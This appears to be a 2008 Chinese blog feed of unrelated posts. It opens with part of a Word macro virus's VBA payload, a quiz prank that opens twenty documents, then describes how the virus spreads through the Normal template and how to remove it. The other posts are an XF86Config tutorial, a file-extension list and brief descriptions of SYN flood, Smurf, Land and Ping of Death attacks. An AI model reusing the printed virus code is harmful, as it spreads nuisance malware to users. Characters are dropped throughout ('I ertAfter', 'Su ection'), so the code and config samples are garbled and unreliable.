beg: Beep a $ = I utBox$("今天是" + Date$ + ",跟你玩一个心算游戏" + Chr$(13) + "若你答错，只好接受震撼教育......" + Chr$(13) + tog$, "台湾NO.1 Macro Virus") If RTrim$(LTrim$(a $)) = LTrim$(Str$(con)) Then Documents.Add Selection.Paragraphs.Alignment = wdAlignParagraphCenter Beep With Selection.Font .Name = "细明体" .Size = 16 .Bold = 1 .Underline = 1 End With Selection.I ertAfter Text:="何谓宏病毒" Selection.I ertParagraphAfter Beep Selection.I ertAfter Text:="***：" Selection.Font.Italic = 1 Selection.I ertAfter Text:="我就是......" Selection.I ertParagraphAfter Selection.I ertParagraphAfter Selection.Font.Italic = 0 Beep Selection.I ertAfter Text:="如何预防宏病毒" Selection.I ertParagraphAfter Beep Selection.I ertAfter Text:="***：" Selection.Font.Italic = 1 Selection.I ertAfter Text:="不要看我......" GoTo out Else Count = Count + 1 For j = 1 To 20 Beep Documents.Add Next j Selection.Paragraphs.Alignment = wdAlignParagraphCenter Selection.I ertAfter Text:="宏病毒" If Count = 2 Then GoTo out GoTo try End If
End Sub &8226 该病毒的效果如下：当打开被感染的word文档时，首先进行自我复制，感染word模板，然后检查日期，看是否是1日（即在每月的1日会发作），然后跳出一个对话框，要求用户进行一次心算游戏，这里只用四个小于10的数相乘，如果用户的计算正确，那么就会新建一个文档，跳出如下字幕：“何谓宏病毒，***：我就是......；如何预防宏病毒，***：不要看我......”。如果计算错误，新建20个写有“宏病毒”字样的word文档，然后再一次进行心算游戏，总共进行3次，然后跳出程序。关闭文档的时候也会执行同样的询问。 &8226 清除宏病毒
– 对每一个受感染的word文档进行如下操作：
– 打开受感染的word文档，进入宏编辑环境（Alt+F11），打开NormalàMicrosoft Word对象àThis Document，清除其中的病毒代码（只要删除所有内容即可）。
– 然后打开ProjectàMicrosoft WordàThis Document，清除其中的病毒代码。
– 实际上，模板的病毒代码只要在处理最后一个受感染文件时清除即可，然而清除模板病毒后，如果重新打开其他已感染文件，模板将再次被感染，因此为了保证病毒被清除，可以查看每一个受感染文档的模板，如果存在病毒代码，都进行一次清除。 ( Wed, 7 May 2008 09:53:35 +0800 )
Description: X-Window 系统给我们提供了许多配置工具，但最终也是生成了一个配置文件：
XF86Config，它存放在/etc/X11 目录下。如果你能够直接读懂它，那么对其做一些小的调整，
那将是十分容易的事。现在我们就一起来分析一下这个配置文件。
它分成了许多个小节，每个小节分别配置一部分。 1、 File 配置小节
设置 X Window系统所用的字体路径，下面是一个配置实例：
Section "Files"
RgbPath "/usr/X11R6/lib/X11/rgb"
FontPath "/usr/X11R6/lib/X11/fonts/TrueType"
FontPath "unix/:-1"
EndSection
其中 Section “Files表示 Files 小节开始，EndSection表示这个小节结束。其间有几个配
置项：
1） RgbPath：设置 RGB色彩数据库的路径。这个配置项的内容是在***的时候就写好
的，肯定没错，别改它。
2） FontPath：用来设置字体的路径。而象 Redhat linux 会采用 X Font Server（字体服
务器）来管理所有的字体，这时，你就会看到字体路径就象："unix/:-1" 2、 Server Flag 配置小节
设置 X Server 的各种选项，包括一些功能键的设置，下面是一个配置实例：
Section "ServerFlags"
# NoTrapSignals
# DontZap
# DontZoom
# DisableVidModeExte ion
# AllowNonLocalXvidtune
# DisableModInDev
# AllowNonLocalModInDev
EndSection
Section "ServerFlags"表示Server Flags小节的开始，EndSection 表示该小节的结束，其
中有以下几个配置项：
1） NoTrapSignals：不捕捉信号，在错误发生时直接 dump 产生 Core 文件。若启用这
项设置将可能导致控制台不稳定，不过对于高手而言，dump 产生的 core 文件有利于纠错。
建议不启用。
2） DontZap：取消使用 Ctrl+Alt+Back ace 组合热键退出 X Window 系统的功能。默
认是注释掉它，也就是说可以使用 Ctrl+Alt+Back ace 组合热键退出 X Window系统。建议
不启用。
3） DontZoom：取消使用 Ctrl+Alt++和 Ctrl+Alt+-组合键切换显示模式的功能。默认是
注释掉它的，也就是说可以使用这两个组合键进行显示模式的切换。建议不启用。
4） DisableVidModeExte ion：禁示使用 xvidtune程序调整画面。
5） AllowNonLoaclXvidtune：允许使用非本地端的 xvidtune程序。
6） DisableModInDev：关闭动态变更输入设备的设置。
7） AllowNonLocalModInDev：允许非本地端变更键盘和鼠标的设置。
注：xvidtune程序是 X windows 中提供的一个应用程序，它用来调整画面显示大小和位
置的程序。 3、 键盘配置小节
设置各式键盘，在此可以指定键盘的传输协议、语系、信号、字符对照表，下面是一个
配置实例：
Section "Keyboard"
Protocol "Standard"
AutoRepeat 500 5
# ServerNumLock
LeftAlt Meta
RightAlt Meta
ScrollLock Compose
RightCtl Control
# XkbDisable
# XkbModel "pc102"
# XkbModel "microsoft"
# XkbOptio "ctrl:swapca "
XkbRules "xfree86"
XkbModel "pc101"
XkbLayout "en_US"
EndSection
Section "Keyboard"表示 Keyboard 小节的开始，EndSection 表示该小节的结束，其中有
以下几个配置项：
1） Protocol：用来配置键盘所使用的传输协议。可选值为：
Standard：标准传输协议
Xqueue：使用 X队列传输协议
默认值就是 Standard，一般无需修改，大家的大都是标准的键盘。
2） AutoRepeat：用来配置对按住某键不放的处理，格式为：
AutoRepeat 毫秒数 次数
如：AutoRepeat 500 5，表示当按住某键 500 毫秒（0.5 秒）后，开始自动送出该按键信
号，每秒 5次。
3） ServerNumLock：让 X server 处理 NumLock 信号，效果等于关闭键盘右方数字键
的功能。
4） 以下一组配置项是用来设置键盘上 Alt、Ctrl、Shift、ScrollLock 等键的 功能定义： LeftAlt Meta
RightAlt Meta
ScrollLock Compose
RightCtl Control
左边是键名，LeftAlt 就是左边的 ALT 键，RightAlt 就是右边的 ALT 键…，而右边则
是功能定义，包括：
Compose：等于一般 Scroll Lock 按键的功能；
Control：等于一般 Ctrl按键的功能；
Meta：等于一般 Alt 按键的功能；
ModeLock：等于一般 Ca Lock 按键的功能
ModeShift：等于一般 Shift 按键的功能。
接下来则是关于 XKB 的配置：
5） XkbDisable：关闭键盘扩展属性，也即不指定其类型及对应的语言
6） XkbCompat：设置键盘兼容性，缺省值是“default，包含有“Basic的设置，按串口
的 “mousekeys 、 “acce x 、 “misc 、 “iso9995 与 “japan ，相关文件配置放在
/usr/X11R6/lib/X11/xkb/compat 目录下。
7） XkbGeometry：指定键盘结构，不同的键盘有不同的硬件结构，除非是使用 Amiga、
Atari、Macintosh 等专用键盘，否则应使用缺省值“pc，不设置也行。它的相关选项在
/usr/X11R6/lib/X11/xkb/geometry目录下。
8） XkbKeycodes：指定键盘按键送出的信息，缺省值为“xfree86，其余的可用设置位
于/usr/X11R6/lib/X11/xkb/keycodes目录下。
9） XkbKeymap：指定键盘配置类型设置文件，可用的文件位于/usr/X11R6/lib/X11/xkb
目录里的 keymap 子目录。如果设置了本选项相当于同时设置了 XkbKeycodes、XkbTypes、
XkbCompact、XkbSymbols以及 XkbGeometry。
10）XkbLayout：设置键盘输出语系，使用缺省值“us即采用美式英文。可选值为：
de：德文 fr：法文 it：意大利文 jp：日文 ru：俄文
11）XkbModel：设置键盘的型号，常见的是 “pc101、“pc102。若采用具有微软标志
的键盘的话，请改为“pc104。
12）XkbOptio ：设置键盘选项，通常并不需要任何选项设置，除非您想要交换按键的
定义。如“ctrl:swapca 就可以将 Ctrl与 Ca Lock键互换。
13）XkbRules：指定 X window 采用的键盘规范文件，除非有特殊需要（使用 SGI 的键
盘），否则应使用缺省值：“xfree86，其它的可选值在/usr/X11R6/lib/X11/xkb/rules目录下。 14）XkbSymbols：定义键盘各按键所对应的字码，各国键盘革些字码不尽相同。缺省
使用“us，即 ASCII，字码表对照文件放在/usr/X11R6/lib/X11/xkb/symbol目录下，用户可以
修改。
15）XkbTypes：设置键盘的种类，缺省值为“default，在/usr/X11R6/lib/X11/xkb/types
目录下给出了所有的选项。
16）XkbVariant：设置键盘变量，通常无须设置。 4、鼠标配置小节
设置诸如鼠标、触摸屏等标准输入设备。下面是一个配置实例：
Section "Pointer"
Protocol "PS/2"
Device "/dev/mouse"
# Protocol "Xqueue"
# BaudRate 9600
# SampleRate 150
Emulate3Butto Emulate3Timeout 50
# ChordMiddle
EndSection
与前面一样，Section "Pointer"代表该小节的开始，EndSection代表该小节结束。在该配
置小节中，共有以下配置项：
1） Protocol：设置鼠标使用的传输协议，可使用的协议有：
Auto：让 X window 自已检测，但可能不准确
BusMouse：总线型鼠标，早期的串口鼠标
GlidePoint：使用 ALPS 串口版本的 GlidePoint 触摸屏及其兼容产品
GlidePointPS/2：使用 ALPS PS2 版本的 GlidePoint触摸屏及其兼容产品
IMPS/2：使用微软 PS/2版本的 IntelliMouse 及其兼容产品
IntelliMouse：使用微软串口版本的 IntelliMouse及其兼容产品
Logitech：使用旧版 Logitech 串口鼠标，新版的已改为“Microsoft协议
Microsoft：在 1992 年起的 5-8 年间使用的串口鼠标
MMHitTab：使用旧版 Logitech 串口的 HitTablet手机板
MMSeries：使用旧版 Logitech 串口的 MouseMan 鼠标
MouseMan：使用中期的 Logitech 串口的 MouseMan 鼠标
MouseManPlusPS/2：使用 LogitechPS/2 版本的天貂及其兼容产品
MouseSystem：采用 MouseSystem传输协议的串口鼠标可以使用该选项
NetMosuePS/2：使用 Genius PS/2 版本的 NetMouse网络鼠标及其兼容产品
NetScrollPS/2：使用 Genius PS/2 版本的 NetScroll滚轮鼠标及其兼容产品
OSMouse：使用由操作系统控制的鼠标，而非让 X Window控制鼠标
PS/2：现在最广泛使用的 PS/2 接口的鼠标
SysMouse：让 FreeBSD 能够使用外围设备代号为/dev/sysmouse 的鼠标设备
ThinkingMouse：使用 Ke ington 串口版本的 Thinking 鼠标
ThinkingMousePS/2：使用 PS/2 版本的 Thinking鼠标及其兼容产品
Xqueue：假如你在键盘设备段让键盘使用 X队列传输协议，则这里也要
2） Device：用来设置连接鼠标的外围设备代码，通常都是/dev/mouse
3） BaudRate：用来设置波特率，只对某些 Logitech 鼠标有效，当使用 AceCad 绘图板
时，需要将其设置为 9600
4） SampleRate：用来设置采样率，只对某些 Logitech 鼠标有效
5） Emulate3Butto ：将双键鼠标模拟成为三键鼠标
6） Emulate3Timeout：设置模拟三键超时时间
7） ChordMiddle：如果是 Logitech鼠标，那么得用这一配置项代替 Emulate3Butto 5、 显示器配置小节
设置显示器的水平、 垂直扫描频率， 同时定义各个显示模式与扫描频率之间的对应关系。
X Server 会根据显示器扫描频率的设置，配置用户指定的显示模式，自动在数十种的对应关
系中，找到最恰当的显示刷新率。下面是一个配置实例：
Section "Monitor"
Identifier "Generic Monitor"
VendorName "Unknown"
ModelName "Unknown"
HorizSync 31.5
VertRefresh 60
ModeLine "640x480" 25.175 640 664 760 800
480 491 493 525
EndSection
Section "Monitor"
Identifier "cpq1355"
VendorName "Unknown"
ModelName "Unknown"
HorizSync 30 – 60
VertRefresh 50 – 125
# Mode "1024x768i"
# DotClock 45
# HTimings 1024 1048 1208 1264
# VTimings 768 776 784 817
# Flags "Interlace"
# EndMode
# --- 640x480 ---
# 640x480 @ 60 Hz, 31.5 kHz hsync
Modeline "640x480" 25.175 640 664 760 800
480 491 493 525
# 640x480 @ 72 Hz, 36.5 kHz hsync
Modeline "640x480" 31.5 640 680 720 864
480 488 491 521
# 640x480 @ 75 Hz, 37.50 kHz hsync
ModeLine "640x480" 31.5 640 656 720 840
480 481 484 500 -HSync –Vsync
# 640x480 @ 85 Hz, 43.27 kHz hsync
Modeline "640x480" 36 640 696 752 832
480 481 484 509 -HSync –Vsync
# 640x480 @ 100 Hz, 53.01 kHz hsync
Modeline "640x480" 45.8 640 672 768 864
480 488 494 530 -HSync –Vsync
# --- 800x600 ---
# 800x600 @ 56 Hz, 35.15 kHz hsync
ModeLine "800x600" 36 800 824 896 1024
600 601 603 625
# 800x600 @ 60 Hz, 37.8 kHz hsync
Modeline "800x600" 40 800 840 968 1056
600 601 605 628 +hsync +vsync
# 800x600 @ 72 Hz, 48.0 kHz hsync
Modeline "800x600" 50 800 856 976 1040
600 637 643 666 +hsync +vsync
# 800x600 @ 85 Hz, 55.84 kHz hsync
Modeline "800x600" 60.75 800 864 928 1088
600 616 621 657 -HSync –Vsync
# 800x600 @ 100 Hz, 64.02 kHz hsync
Modeline "800x600" 69.65 800 864 928 1088
600 604 610 640 -HSync –Vsync
# --- 1024x768 ---
# 1024x768 @ 60 Hz, 48.4 kHz hsync
Modeline "1024x768" 65 1024 1032 1176 1344
768 771 777 806 -hsync –vsync
# 1024x768 @ 87 Hz interlaced, 35.5 kHz hsync
Modeline "1024x768" 44.9 1024 1048 1208 1264
768 776 784 817 Interlace
# 1024x768 @ 70 Hz, 56.5 kHz hsync
Modeline "1024x768" 75 1024 1048 1184 1328
768 771 777 806 -hsync –vsync
# 1024x768 @ 76 Hz, 62.5 kHz hsync
Modeline "1024x768" 85 1024 1032 1152 1360
768 784 787 823
# 1024x768 @ 85 Hz, 70.24 kHz hsync
Modeline "1024x768" 98.9 1024 1056 1216 1408
768 782 788 822 -HSync –Vsync
# 1024x768 @ 100Hz, 80.21 kHz hsync
Modeline "1024x768" 115.5 1024 1056 1248 1440
768 771 781 802 -HSync –Vsync
EndSection
正如上面所示， 在一个配置文件中可以有多个 Monitor配置小节， 用来配置多个显示器。
以供后面选择使用。 每个 Monitor配置小节都应该使用 Section “Monitor开始， 以 EndSection
结束。下面我们就一起来看一下配置选项：
1） Identifier、VendorName、ModelName：这三个配置项用来标识不同的显示器，第
一个名字任意写，你自己知道就可以了，后面两个也可以随便新，不过写成“unkown最好。 2） HorizSync：设置水平扫描频率，它的缺省单位是 kHz，它可以用逗号分隔开多个
独立的数值，也可以使用形如“30-64的方式来表示一个范围。具体的值应该根据显示器的
使用说明上的数据来写。
3） VerRefresh：设置垂直扫描频率，它的缺省单位是 Hz，表示方式与 HorizSync 一致，
建议根据显示器的使用说明上的数据来写。 6、显卡配置小节
置显卡的型号、芯片组、晶振芯片、显存。下面是一个配置实例：
Section "Device"
Identifier "ATI Mach64"
VendorName “Unknown?
BoardName “Unknown?
#Chi et “Generic?
VideoRam 1024
# Clocks 25.2 28.3
EndSection
其配置选项如下：
1） Identifier：用来标识显卡
2） Chi et：用来标识显卡芯片组
3） VideoRam：用来标识显存
4） Clocks：晶振芯片 7、屏幕配置小节
设置将采用的 X Server、显卡及显示器之外，还有显示模式、色彩深度、分辨率和虚拟
桌面的设置。下面是一个配置实例：
Section "Screen"
Driver "accel"
Device "ATI Mach64"
Monitor "cpq1355"
DefaultColorDepth 16
Su ection "Di lay"
Depth 16
Modes "800x600" "640x480"
ViewPort 0 0
EndSu ection
Su ection "Di lay"
Depth 8
Modes "1152x864" "1024x768" "800x600" "640x480"
ViewPort 0 0
EndSu ection
# BlankTime 3
# StandbyTime 10
# Su endTime 30
#Offtime 50
EndSection
1） Driver：选择 X Server 驱动，在本例中是 accel
2） Device：选择所使用的显卡，这里的名字应与显卡配置小节的 Identifier 一致
3） Monitor：选择所使用的显示器，这里的名字应与显示器配置小节的 Identifier一致
4） BlankTime：设置进入屏幕保护的时间，单位为分。
5） StandbyTime：设置显示器进入待机状态的时间，单位为分
6） Su endTime：设置显示器进入挂起状态的时间，单位为分
7） Offtime：设置显示器关闭的时间，单位为分在这个小节中，还有 Di lay子小节，
用 Su ection “Di lay做为开始，用 EndSu ection 表示结束。每一个子小节设置一种显示
模式，在此例子中设置了两种显示模式（这些模式在 X Window中，可以使用“Ctrl”+　?
“Ctrl”+±辞谢弧?
每个 Di lay子小节中可以有以下配置项：
1） Depth：色深，如 16代表 16 位色，8 代表8 位色
2） Modes：可以使用的分辨率，如本配置中表示 16 位色可以使用"800x600" "640x480"
两种分辨率
3） ViewPort：使用虚拟桌面时，设置起始画面的左上角坐标
4） Virtual：设置虚拟桌面，后面跟上分辨率即可，如 Virtual 1600 1400就表示模拟成
为 1600x1400 大小的桌面
( Mon, 5 May 2008 22:23:57 +0800 )
Description:
ACE：Ace压缩档案格式
ACT：Microsoft office助手文件
AIF，AIFF：音频互交换文件，Silicon Graphic and Macintosh应用程序的声音格式
ANI：Windows系统中的动画光标
ARC：LH ARC的压缩档案文件
ARJ：Robert Jung ARJ压缩包文件
ASD：Microsoft Word的自动保存文件；Microsoft高级流媒体格式（microsoft advanced streaming
format，ASF）的描述文件；可用NSREX打开 Velvet Studio例子文件
ASF：Microsoft高级流媒体格式文件
ASM：汇编语言源文件，Pro/E装配文件
ASP：动态网页文件；ProComm Plus***与连接脚本文件；Astound介绍文件
AST：Astound多媒体文件；ClarisWorks“助手”文件
Axx：ARJ压缩文件的分包序号文件，用于将一个大文件压至几个小的压缩包中（xx取01-99的数字）
A3L：Authorware 3.x库文件
A4L：Authorware 4.x库文件
A5L：Authorware 5.x库文件
A3M，A4M：Authorware Macintosh未打包文件
A3W，A4W，A5W：未打包的Authorware Windows文件
BAK：备份文件
BAS：BASIC源文件
BAT：批处理文件
BIN：二进制文件
BINHex：苹果的一种编码格式
BMP：Windows或OS/2位图文件
BOOK：Adobe FrameMaker Book文件
BOX：Lotus Notes的邮箱文件
BPL：Borlard Delph 4打包库
BSP：Quake图形文件
BUN：CakeWalk 声音捆绑文件(一种MIDI程序)
C0l：台风波形文件
CAB：Microsoft压缩档案文件
CAD：Softdek的Drafix CAD文件
CAM：Casio照相机格式
CAP：压缩音乐文件格式
CAS：逗号分开的ASCⅡ文件
CCB：Visual Basic动态按钮配置文件
CCH：Corel图表文件
CCO：CyberChat数据文件
CCT：Macromedia Director Shockwave投影
CDA：CD音频轨道
CDF：Microsoft频道定义格式文件
CDI：Philip的高密盘交互格式
CDM：Visual dBASE自定义数据模块文件
CDR：CorelDRAW绘图文件；原始音频CD数据文件
CDT：CorelDRAW模板
CDX：CorelDRAW压缩绘图文件；Microsoft Visual FoxPro索引文件
CFG：配置文件
CGI：公共网关接口脚本文件
CGM：计算机图形元文件
CH：OS/2配置文件
CHK：由Windows磁盘碎片整理器或磁盘扫描保存的文件碎片
CHM：编译过的HTML文件
CHP：Ventura Publisher章节文件
CHR：字符集（字体文件）
CHT：ChartViem文件；Harvard Graphics矢量文件
CIF：Adaptec CD 创建器 CD映像文件
CIL：Clip Gallery下载包
CIM：SimCity 2000文件
CIN：OS/2改变控制文件用于跟踪INI文件中的变化
CLASS：Java类文件
CLP：Windows 剪贴板文件
CLL：Crick Software Clicker文件
CLS：Visual Basic类文件
CMD：Windows NT，OS/2的命令文件；DOS CD/M命令文件；dBASEⅡ程序文件
CPI：Microsoft MS-DOS代码页信息文件
CPL：控制面板扩展名，Corel颜色板
CPP：C++代码文件
CPR：Corel提供说明书文件
CPT：Corel 照片-绘画图像
CST：Macromedia Director Cast文件
CUR：Windows光标文件
DBF：dBASE文件，一种由Ashton-Tate创建的格式，可以被ACT！、Li er、FoxPro、Arago、Wordtech、Xbase和类似数据库或与数据库有关产品识别；可用数据文件（能被Excel
97打开）；Oracle 8.1.x表格空间文件
DBX：DataBearn图像；Microsoft Visual FoxPro表格文件
DCT：Microsoft Visual FoxPro数据库容器
DCU：Delphi编译单元文件
DCX：Microsoft Visual FoxPro数据库容器；基于PCX的传真图像；宏
DIR：MacromediaDirector文件
DLL：动态链接库
DOC：FrameMaker或FrameBuilder文档；Word Star文档、Word
Perfect文档、Microsoft：Word文档；Di layWrite文档
DOT：Microsoft Word文档模板
DPL：Borland Delph 3压缩库
DRV：驱动程序
DRW：Micrografx Designer/Draw；Pro/E绘画文件
DSF：Micrografx Designer VFX文件
DSG：DOOM保存的文件
DSM：Dynamic Studio音乐模块（MOD）文件
DSP：Microsoft Developer Studio工程文件
DSQ：Corel QUERY（查询）文件
DST：刺绣机图形文件
DSW：Microsoft Developer Studio工作区文件
DTA：World Bank（世界银行）的STARS数据文件
DTD：SGML文档类型定义（DTD）文件
DTED：地面高度数字数据（图形的数据格式）文件
DTF：Symantec Q&am A相关的数据库数据文件
DTM：DigiTrakker模块文件
DUN：Microsoft拔号网络导出文件
DV：数字视频文件（MIME）
DWG：AutoCAD工程图文件；AutoCAD或Generic CADD老版本的绘图格式
DXR：Macromedia Director受保护（不可编辑）电影文件
EDA：E oniq ASR磁盘映像
EDD：元素定义文档（FrameMaker+SGML文档）
EDE：E oniq EPS磁盘映像
EDK：E oniq KT磁盘映像
EDQ：E oniq SQ1/SQ2/Ks32磁盘映像
EDS：E oniq SQ80磁盘映像
EDV：E oniq VFX-SD磁盘映像
EFA：E oniq ASR文件
EFE：E oniq EPS文件
EFK：E oniq KT文件
EFQ：E oniq SQ1/SQ2/Ks32文件
EFS：E oniq SQ80文件
EFV：E oniq VFX-SD文件
EMD：ABT扩展模块
EMF：Windows增强元文件
EML：Microsoft Outlook Expre 邮件消息（MIME RTC822）文件
EXE：可执行文件（程序）
F***：Microsoft Outlook导航条
FAX：传真类型图像
FCD：虚拟CD-ROM
FDF：Adobe Acrobat表单文档文件
FLA：Macromedia Flash电影
FND：Microsoft Explorer保存的搜索文件（Find a let）
FON：系统字体
FRT：Microsoft FoxPro报表文件
FRX：Visual Basic表单文本；Microsoft FoxPro报表文件
FXP：经Microsoft FoxPro编译的源文件
GDM：铃声、口哨声和声音板模块格式
GetRight：GetRight未完成的下载文件
GHO：Norton 克隆磁盘映像
GID：Windows 95全局索引文件（包括帮助状态）
GIF：CompuServe位图文件
GL：动画格式
GRP：程序管理组
HEX：Macintosh BinHex2.0文件
HLP：帮助文件；Date CAD Windows帮助文件
HPP：C++程序头文件
HQX：Macintosh BinHex 4.0文件
HT：HyperTerminal（超级终端）
HTM，HTML：超文本文档
HTT：Microsoft超文本模板
HTX：扩展HTML模板
ICO：Windows图标
IDX：Microsoft FoxPro相关数据库索引文件；Symantec Q&am A相关数据库索引文件；Microsoft Outlook
Expre 文件
IMG：GEM映像
INF：信息文件
INI：初始化文件；Mwave DSP Synth的“nwsynth.ini” GMS***；Cravis Ultrasound bank***
INP：Oracle 3.0版或早期版本的表单源代码
INRS：INRS远程通信声频
INS：I tallShield***脚本；X-Internet签字文件；E oniq EPS字簇设备；Cell/ⅡMAC/PC抽样设备
INT：中间代码，当一个源程序经过语法检查后编译产生一个可执行代码
IOF：Findit文档
IQY：Microsoft Internet查询文件
ISO：根据ISD 9660有关CD-ROM文件系统标准列出CD-ROM上的文件
ISP：X-Internet签字文件
IST：数字跟踪设备文件
ISU：I tallShield卸装脚本
IT：脉冲跟踪系统音乐模块(MOD)文件
ITI：脉冲跟踪系统设备
ITS：脉冲跟踪系统抽样，Internet文档位置
IV：Open Inventor中使用的文件格式
IVD：超过20/20微观数据维数或变量等级文件
IVP：超过20/20的用户子集配置文件
IVT：超过20/20表或集合数据文件
IVX：超过20/20微数据目录文件
IW：Idlewild屏幕保护程序
IWC：I tall Watc***档
J62：Ricoh照相机格式
JAR：Java档案文件（一种用于a let和相关文件的压缩文件）
J***A：Java源文件
JAR：Java档案文件（一种用于a let和相关文件的压缩文件）
J***A：Java源文件
JFF，JFIF，JIF：JPEG文件
JPE，JPEG，JPG：JPEG图形文件
JS：javascript源文件
JSP：HTML网页，其中包含有对一个Java servlet的参考
KAR：卡拉OK MIDI文件（文本+MIDI）
LAB：Visual dBASE标签文件
LBT，LBX：Microsoft FoxPro标签文件
LDB：Microsoft Acce 加锁文件
LHA：LZH更换文件后缀
LOG：日志文件
LZH：LH ARC压缩档案
M1V：MPEG相关文件(MIME"mpeg"类型)
M3D：Corel Motion 3D动画文件
M3U：MPEG URL（MIME声音文件）
MAM：Microsoft Acce 宏
MAQ：Microsoft Acce 查询文件
MAR：Microsoft Acce 报表文件
MBX：Microsoft Outlook保存email格式；Eudora邮箱
MCW：Microsoft Word的Macintos***档
MDB：Microsoft Acce 数据库
MDN：Microsoft Acce 空数据库模板
MDW：Microsoft Acce 工作组文件
MID：MIDI音乐
MMM：Microsoft多媒体电影
MOV：QuickTime for Windows电影
MP2：第二层MPEG音频文件
MP3：第三层MPEG音频文件
MPA：MPEG相关文件，MIME“mpeg类型”
MPE，MPEG，MPG：MPEG动画文件
MPP：Microsoft工程文件；CAD绘图文件格式
MPR：Microsoft FoxPro菜单（已编译）
MSI：Windows ***器包
MSN：Microsoft 网络文档；Descent Mi ion文件
OBD：Microsoft Office活页夹
OBJ：对象文件
OBZ：Microsoft Office活页夹向导
OCX：Microsoft对象链接与嵌入定制控件
ODS：Microsoft Outlook Expre 邮箱文件
OFT：Microsoft Outlook模板
OPX：OPL扩展DLL（动态链接库）
OSS：Microsoft Office查找文件
OST：Microsoft Exchange / Outlook 离线文件
PAL：压缩文件
PART：Go！Zilla部分下载文件
PAS：Pascal源代码
PCS：PICS动画文件
PDF：Adobe Acrobat
可导出文档格式文件（可用Web浏览器显示）；Microsoft系统管理服务器包定义文件；NetWare打印机定义文件
PHP，PHP3：包含有PHP脚本的HTML网页
PHTML：包含有PHP脚本的HTML网页；由Perl分析解释的HTML
PM5：Pagemaker 5.0文件
PM6：Pagemaker 6.0文件
PPS：Microsoft Powerpoint幻灯片放映
PPT：Microsoft Powerpoint演示文稿
PRF：Windows系统文件，Macromedia导演设置文件
PSD：Adobe photoshop位图文件
PSM：Protracker Studio模型格式；Epic游戏的源数据文件
PST：Microsoft Outlook个人文件夹文件
PWL：Windows 95口令列表文件
QIF：QuickTime相关图像（MIME）；Quicken导入文件
QT，QTM：QuickTime电影
QTI，QTIF：QuickTime相关图像
QTP：QuickTime优先文件
QTS：Mac PICT图像文件；QuickTime相关图像
QTX：QuickTime相关图像
RA：RealAudio声音文件
RAM：RealAudio元文件
RAR：RAR压缩档案（Eugene Roshall格式）
REC：录音机宏；RapidComm声音文件
REG：注册表文件
REP：Visual dBASE报表文件
RES：Microsoft Visual C++资源文件
RM：RealAudio视频文件
RMF：Rich Map格式（3D游戏编辑器使用它来保存图）
ROM：基于盒式磁带的家庭游戏仿真器文件（来自Atari
2600、Colecovision、Sega、Nintendo等盒式磁带里的ROM完全拷贝，在两个仿真器之间不可互修改）
Rxx：多卷档案上的RAR压缩文件（xx=1～99间的一个数字）
S***：游戏保存文件
SB：原始带符号字节（8位）数据
SBK：Creative La 的Soundfont 1.0 Bank文件；(Soundb laster)/EMU So dFont v1.x
Bank文件
SBL：Shockwave Flash对象文件
SCF：Windows Explorer命令文件
SCH：Microsoft Schedule+1
SCP：拨号网络脚本文件
SCR：Windows屏幕保护；传真图像；脚本文件
SFX：RAR自解压档案
SHTML：含有服务器端包括（SSI）的HTML文件
SPL：Shockwave Flash对象；DigiTrakker抽样
SQL：Informix SQL查询；通常被数据库产品用于SQL查询（脚本、文本、二进制）的文件扩展名
STM：.shtml的短后缀形式，含有一个服务端包括（SSI）的HTML文件；Scream Tracker V2音乐模块（MOD）文件
STR：屏幕保护文件
SWA：在Macromedia导演文件（MP3文件）中的Shockwave声音文件
SWF：Shockwave Flash对象
SYS：系统文件
T64：Commodore 64仿真器磁带映像文件
THEME：Windows 95桌面主题文件
TIF，TIFF：标签图像文件格式（TIFF）位图
TMP：Windows临时文件
TRM：终端文件
TXT：ASCⅡ文本格式的声音数据
TZ：老的压缩格式文件
VBA：VBase文件
VBP：Microsoft Visual Basic工程文件
VBW：Microsoft Visual Basic工作区文件
VBX：Microsoft Visual Basic用户定制控件
VQE，VQL：Yamaha Sound-VQ定位器文件
VQF：Yamaha Sound-VQ文件（可能出现标准）
VRF：Oracle 7配置文件
VSL：下载列表文件（GetRight）
WAB：Microsoft Outlook文件
WAD：包含有视频、玩家水平和其他信息的DOOM游戏的大文件
WAL：Quake 2正文文件
W***：Windows波形声形
WBK：Microsoft Word备份文件
WFM：Visual dBASE Windows表单
WFN：在CorelDRAW中使用的符号
WIZ：Microsoft Word向导
WRL：虚拟现实模型
WWL：Microsoft Word内插器文件
XLK：Microsoft Excel备份
XLL：Microsoft Excel内插器文件
XLM：Microsoft Excel宏
XLS：Microsoft Excel工作单
XLT：Microsoft Excel模板
XLV：Microsoft Excel VBA模块
XLW：Microsoft Excel工作簿/工作区
ZAP：Windows软件***配置文件
ZIP：Zip文件
000-999：用于为老版本（或备份）文件编号（比如：被***程序改变的CONFIG.SYS文件）；又可用于为小范围的PC应用程序的多个用户相关数据文件编号
12M：Lotus 1-2-3 97 SmartMaster文件
123：Lotus 1-2-3 97文件
2D：VersaCAD的2维绘画文件
2GR，3GR：在Windows之下的VGA图形驱动程序/配置文件
386：在386或更高级处理器上使用的文件
3D：VersaCAD的3维绘画文件
3DM：3D NURBS建模器，Rhino
3DS：3D Studio（DOS下）格式文件
386：在386或更高级处理器上使用的文件
4GE：Informix 4GL编译后代码
4GL：Informix 4GL源代码
669：Composer 669；UNIX Composer音乐模型文件；669磁道模块
#01 及更高的号：为计算机演示而扫描的一系列电影的图片文件编号方法
$$$：OS/2用来跟踪档案文件
@@@：用于***过程中的屏幕文件和用于Microsoft Code view for C这样的应用程序的指导文件
( Mon, 5 May 2008 22:18:43 +0800 )
Description: Synflood:该攻击以多个随机的源主机地址向目的主机发送SYN包，而在收到目的主机的SYN ACK后并不回应，这样，目的主机就为这些源主机建立了大量的连接队列，而且由于没有收到ACK一直维护着这些队列，造成了资源的大量消耗而不能向正常请求提供服务。
Smurf:该攻击向一个子网的广播地址发一个带有特定请求(如ICMP回应请求)的包，并且将源地址伪
装成想要攻击的主机地址。子网上所有主机都回应广播包请求而向被攻击主机发包，使该主机受到攻击。
Land-based:攻击者将一个包的源地址和目的地址都设置为目标主机的地址，然后将该包通过IP欺骗的方式发送给被攻击主机，这种包可以造成被攻击主机因试图与自己建立连接而陷入死循环，从而很大程度地降低了系统性能。
Ping of Death:根据TCP/IP的规范，一个包的长度最大为65536字节。尽管一个包的长度不能超过65536字节，但是一个包分成的多个片段的叠加却能做到。当一个主机收到了长度大于65536字节的包时，就是受到了Ping of Death攻击，该攻击会造成主机的宕机。
